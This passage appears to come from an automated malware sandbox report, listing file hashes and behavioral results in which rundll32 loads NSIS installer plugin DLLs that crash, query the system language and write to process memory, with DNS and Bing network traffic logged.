| SHA512 | 06849bbb8a9e46445dc30f19fec6d6de0325d0981468ed5c9032b8c74d95252067af71913f67c8d86796d6f97df5784e81a526fcee77e4aa688645d62ad22594 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | b67172dc03787059255910a04e503c1f |
| SHA1 | c5fa607ce7f49ea21be99e85c81e08b48ff6e6a6 |
| SHA256 | a5d9296206bb705d8ea2caa0296ea45b2534f7c0d306a7253f20e90a999f70e0 |
| SHA512 | 835b1672a22466de661a78577f0234bc4ad941a2787acdf695589d1d68d7607328edf9f33f747f6d945b54b9a81fe0893d6af1671c8af054208450a17c61f7b3 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | e3e7b6547cbc72cd52dba5012113cbaf |
| SHA1 | 1c6f747cccd7034b81cf4907f236cbd098fd030b |
| SHA256 | 7333697624997e5b91986eed05d29c24e871c689ccf38aec78b1173936c628bd |
| SHA512 | 7fb9e707afc16da8e0d11dfd8244a345db58f59c6b8b9fc2eba3ba580432164805f715da797c93c7e1d4f9f3bc51cfb5afb3c740abc6901ecf56a6699d01e43f |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 1e1a99d240ed5b18da059b516f339f99 |
| SHA1 | 48aa01a58ba7e98b3e080f7ada1c5697c198298b |
| SHA256 | 9a4fce8f4f6f6697f795220a9889a0063e4496ff568121ef98e2652eec323ad3 |
| SHA512 | 8f1d26b539da067fa3f4cb616b8b165a0f0abd6e923ecf20a68039ab5c0ff139df236703f5b42ebc20b4c6c9d7e2385430ebef61a5c20e22311880b14c3f7634 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 24e88dfa25d52544039eed843dec878d |
| SHA1 | a4a49a2ad1fca719e48ca91ec2690effe46c362f |
| SHA256 | 759ef12969121dbd07092c62b7d529584c4115e4690d736bdb5e82f7d41ee765 |
| SHA512 | 7f3888685fd776f36941556c645aee0c692d447d75baad7600c2d36a47e0853f17c178f1e865b3ccde78634c2551eb0c08bb8db586afb42aedec9ccadd6b0822 |
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
| MD5 | 9a294e54b99b6ce9d3903bfb7354f88e |
| SHA1 | 82a5811657bd9fe992269f140d0e64281500f098 |
| SHA256 | 72c1270892564c368832db8c464c20b8982191a5f9f634cc6c5f4954c47126b7 |
| SHA512 | c0ac7cc9d90c35c980a533cef369d819da91eaeeae6569e04bf0c40fb9397aa263890a5a2570f3dca4e162d6e62afd56956dc3037e63909fc83e0c798a13d49e |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win7-20240903-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 220
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win10v2004-20241007-en
Max time kernel
99s
Max time network
102s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3516 wrote to memory of 3552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3516 wrote to memory of 3552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3516 wrote to memory of 3552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.11.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.108.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win7-20240903-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 220
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:21
Platform
win10v2004-20241007-en
Max time kernel
109s
Max time network
117s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4832 wrote to memory of 4836 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4832 wrote to memory of 4836 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4832 wrote to memory of 4836 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4836 -ip 4836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.11.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |